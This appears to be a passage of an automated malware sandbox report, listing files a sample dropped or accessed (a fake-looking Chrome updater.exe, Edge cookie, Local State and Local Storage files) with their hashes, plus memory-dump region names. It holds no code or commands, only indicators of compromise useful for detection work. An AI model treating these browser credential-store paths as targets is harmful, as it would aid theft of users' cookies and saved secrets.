| SHA512 | d1d4e5110fe083b7221e79ad2a385bf236b39c047fe39eda5f5b1a7ad403064413c588ba19e0267c4d0a18cf6930444ed76bd2d534550462868a0084790165b7 |
memory/3328-446-0x00007FFC1E7D0000-0x00007FFC1E9C5000-memory.dmp
C:\Program Files\Google\Chrome\updater.exe
| MD5 | bc202c47461acbe8bef80e143eb3a364 |
| SHA1 | 0ef433c2e54c4097f0ac3dc722fb9e4e7b7c2634 |
| SHA256 | df144eec828ac28a99d5d148493b3a4c8f36fce79ea7c41c08511ff69d6762bb |
| SHA512 | 3bec158714630e6d38867ddba74eda37e036fa2d31c3b3b83229ab593ee85e36c9964aebb31a847bb5b0e65932d8fcfe0860cb6b2a7a31c10204887daa018e08 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataTR6SP\Local State
| MD5 | 4babfa1eb628818fd007f51e60fcc971 |
| SHA1 | a7aca495edd4d357ddb07172cecd1567d2783f4b |
| SHA256 | 2498ec4ca7ee175991d405e4b8532f02f065ff938d2be824164608095102f3a3 |
| SHA512 | 8dabf8511c81ce8ad3b662a3c47e2cf8cf8dd192091f205ecedb19ef31734234e1ab01f21a37937366d5e0c0ab721c016131ed3d355e32fcad8fa98a9c860f11 |
memory/3864-448-0x00007FF765020000-0x00007FF766285000-memory.dmp
memory/3864-450-0x00007FF765020000-0x00007FF766285000-memory.dmp
memory/3864-453-0x00007FFC1E7D0000-0x00007FFC1E9C5000-memory.dmp
memory/3864-454-0x00007FF765020000-0x00007FF766285000-memory.dmp
\??\pipe\LOCAL\crashpad_2828_BTWOUSNAZTTQOGNV
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/3864-456-0x00007FF765020000-0x00007FF766285000-memory.dmp
memory/3864-457-0x00007FF765020000-0x00007FF766285000-memory.dmp
memory/3864-458-0x00007FF765020000-0x00007FF766285000-memory.dmp
memory/3864-459-0x00007FF765020000-0x00007FF766285000-memory.dmp
memory/3864-461-0x00007FF765020000-0x00007FF766285000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataTR6SP\Default\Local Storage\leveldb\MANIFEST-000001
| MD5 | 5af87dfd673ba2115e2fcf5cfdb727ab |
| SHA1 | d5b5bbf396dc291274584ef71f444f420b6056f1 |
| SHA256 | f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4 |
| SHA512 | de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataTR6SP\Default\Local Storage\leveldb\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataTR6SP\Default\Local Storage\leveldb\LOG
| MD5 | b23645daf6f9e59acbb7258ca37b7ad5 |
| SHA1 | ca3bf1d130e7ea551ce9ef5bc8de361577e8b7cd |
| SHA256 | dc6002c7a84b2d30659490f5e673a2ec22309658907a90e05a8b1a8a21878307 |
| SHA512 | 2d5ee6d7341083c4509e88626376bd34af7c9504f590970db189c58ddc7d4e90622abb9c65a80633ccd16c58b90bbf968df4a595d6056c2fcd16f9ca54338544 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataTR6SP\Default\Local Storage\leveldb\LOG.old
| MD5 | b9e551c29c24eb8e169c16151574127b |
| SHA1 | 2e3239056ac973eb1c55dddee10fb44c7366d3ee |
| SHA256 | b7a1f63ce1a188377aa1ef5e95a1d29367dd65cd1a65ee7674047855d3470684 |
| SHA512 | 298e6e3228abf4c4de665681e7f0966c3cce9c12e9ad0fffa092419dab2c3093ed8eff3b1f6d2e36ac7c1fad10d03f60a54640130e6f1816fccea033602a4176 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataTR6SP\Default\Cookies
| MD5 | 49693267e0adbcd119f9f5e02adf3a80 |
| SHA1 | 3ba3d7f89b8ad195ca82c92737e960e1f2b349df |
| SHA256 | d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f |
| SHA512 | b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2 |
memory/3864-493-0x00007FF765020000-0x00007FF766285000-memory.dmp
memory/1824-509-0x00007FFBFF5F0000-0x00007FFC000B1000-memory.dmp
memory/1824-510-0x000002612B580000-0x000002612B590000-memory.dmp
memory/3864-511-0x00007FFC1E7D0000-0x00007FFC1E9C5000-memory.dmp
memory/1824-512-0x000002612B580000-0x000002612B590000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataTR6SP\Default\GPUCache\data_0
| MD5 | cf89d16bb9107c631daabf0c0ee58efb |
| SHA1 | 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b |
| SHA256 | d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e |
| SHA512 | 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0 |
memory/4924-568-0x00000000747F0000-0x0000000074FA0000-memory.dmp
memory/1824-579-0x000002612BA50000-0x000002612BA6C000-memory.dmp
memory/3864-569-0x00007FF765020000-0x00007FF766285000-memory.dmp
memory/1824-580-0x00007FF40A800000-0x00007FF40A810000-memory.dmp
memory/1824-581-0x000002612BA40000-0x000002612BA4A000-memory.dmp
memory/1824-582-0x000002612BC90000-0x000002612BCAC000-memory.dmp
memory/1824-583-0x000002612BC70000-0x000002612BC7A000-memory.dmp
memory/1824-584-0x000002612BCD0000-0x000002612BCEA000-memory.dmp
memory/1824-585-0x000002612BC80000-0x000002612BC88000-memory.dmp
memory/1824-586-0x000002612BCB0000-0x000002612BCB6000-memory.dmp
memory/1824-587-0x000002612BCC0000-0x000002612BCCA000-memory.dmp
memory/1824-588-0x000002612B580000-0x000002612B590000-memory.dmp
memory/4180-622-0x0000000001260000-0x0000000001280000-memory.dmp
memory/3864-623-0x00007FF765020000-0x00007FF766285000-memory.dmp
memory/4624-625-0x00007FF7B8590000-0x00007FF7B85BA000-memory.dmp
memory/2920-626-0x0000000000500000-0x0000000000627000-memory.dmp
memory/2920-634-0x0000000000500000-0x0000000000627000-memory.dmp
memory/2920-635-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp
memory/2920-637-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp
memory/2920-636-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp
memory/2920-638-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp
memory/2920-639-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp
memory/2920-640-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp
memory/2920-641-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp
memory/2920-642-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp
memory/2920-644-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp
memory/2920-645-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp
memory/2920-643-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp
memory/2920-646-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp
memory/2920-647-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp
memory/2920-648-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp
memory/4180-649-0x00007FF7F9550000-0x00007FF7F9D3F000-memory.dmp
memory/2920-650-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp
memory/2920-651-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp
memory/2920-652-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp
memory/2920-653-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp
memory/2920-655-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp
memory/2920-654-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp
memory/2920-656-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp
memory/2920-657-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp
memory/2920-658-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp
memory/2920-659-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp
memory/2920-660-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp
memory/2920-661-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp
memory/2920-662-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp